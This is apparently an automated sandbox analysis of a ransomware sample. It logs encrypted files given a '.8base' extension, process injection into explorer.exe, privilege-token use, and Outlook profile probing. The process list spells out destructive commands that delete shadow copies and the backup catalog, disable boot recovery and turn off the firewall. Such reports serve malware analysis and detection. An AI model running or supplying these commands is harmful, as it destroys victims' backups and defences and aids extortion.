File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail2-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\OrientationSensorCalibrationFigure.png C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\PREVIEW.GIF.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-gb\ui-strings.js.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.Model.CX.dll C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\mscss7wre_es.dub.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-256.png C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\orbd.exe C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_Subscription-ul-oob.xrm-ms.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_KMS_Client-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_hover_18.svg C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\bs.pak.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldNotContain.snippets.ps1xml C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\msipc.dll.mui C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\msitss55.dll.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\icudt.dll.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODEXL.DLL.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libupnp_plugin.dll.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\libsmartscreen.dll.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSHY7ES.DLL C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Data.OData.NetFX35.dll C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-180.png.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-96_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTrial-ppd.xrm-ms.id[18CA63B3-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.exe C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\css\main.css C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\CCBD.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\usbitrg N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\usbitrg N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\usbitrg N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Roaming\usbitrg N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\C78B.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2700 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe
PID 2700 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe
PID 2700 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe
PID 2700 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe
PID 2700 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe
PID 2700 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe
PID 3200 wrote to memory of 2976 N/A N/A C:\Users\Admin\AppData\Local\Temp\C78B.exe
PID 3200 wrote to memory of 2976 N/A N/A C:\Users\Admin\AppData\Local\Temp\C78B.exe
PID 3200 wrote to memory of 1100 N/A N/A C:\Users\Admin\AppData\Local\Temp\CA4B.exe
PID 3200 wrote to memory of 1100 N/A N/A C:\Users\Admin\AppData\Local\Temp\CA4B.exe
PID 3200 wrote to memory of 1100 N/A N/A C:\Users\Admin\AppData\Local\Temp\CA4B.exe
PID 3200 wrote to memory of 3184 N/A N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe
PID 3200 wrote to memory of 3184 N/A N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe
PID 3200 wrote to memory of 3184 N/A N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe
PID 3200 wrote to memory of 1060 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1060 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1060 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1060 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 1100 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\CA4B.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1100 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\CA4B.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1100 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\CA4B.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3200 wrote to memory of 4504 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 4504 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 4504 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 5088 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 5088 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 5088 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 5088 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1324 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 404 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 404 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 404 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 404 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4276 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 4276 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 4276 N/A N/A C:\Windows\explorer.exe
PID 3184 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe C:\Windows\system32\cmd.exe
PID 3184 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe C:\Windows\system32\cmd.exe
PID 3184 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe C:\Windows\system32\cmd.exe
PID 3184 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\CCBD.exe C:\Windows\system32\cmd.exe
PID 3200 wrote to memory of 3532 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3532 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3532 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3532 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1468 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1468 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1468 N/A N/A C:\Windows\explorer.exe
PID 2292 wrote to memory of 3208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2292 wrote to memory of 3208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3200 wrote to memory of 3708 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3708 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3708 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3708 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 372 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 372 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3200 wrote to memory of 3692 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 3692 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 3692 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 2396 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2396 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2396 N/A N/A C:\Windows\SysWOW64\explorer.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe

"C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe"

C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe

"C:\Users\Admin\AppData\Local\Temp\9769c181ecef69544bbb2f974b8c0e10.exe"

C:\Users\Admin\AppData\Local\Temp\C78B.exe

C:\Users\Admin\AppData\Local\Temp\C78B.exe

C:\Users\Admin\AppData\Local\Temp\CA4B.exe

C:\Users\Admin\AppData\Local\Temp\CA4B.exe

C:\Users\Admin\AppData\Local\Temp\CCBD.exe

C:\Users\Admin\AppData\Local\Temp\CCBD.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\Temp\CCBD.exe

"C:\Users\Admin\AppData\Local\Temp\CCBD.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1180 -ip 1180

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 460

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Users\Admin\AppData\Roaming\usbitrg

C:\Users\Admin\AppData\Roaming\usbitrg

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe

C:\Users\Admin\AppData\Roaming\usbitrg

C:\Users\Admin\AppData\Roaming\usbitrg

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

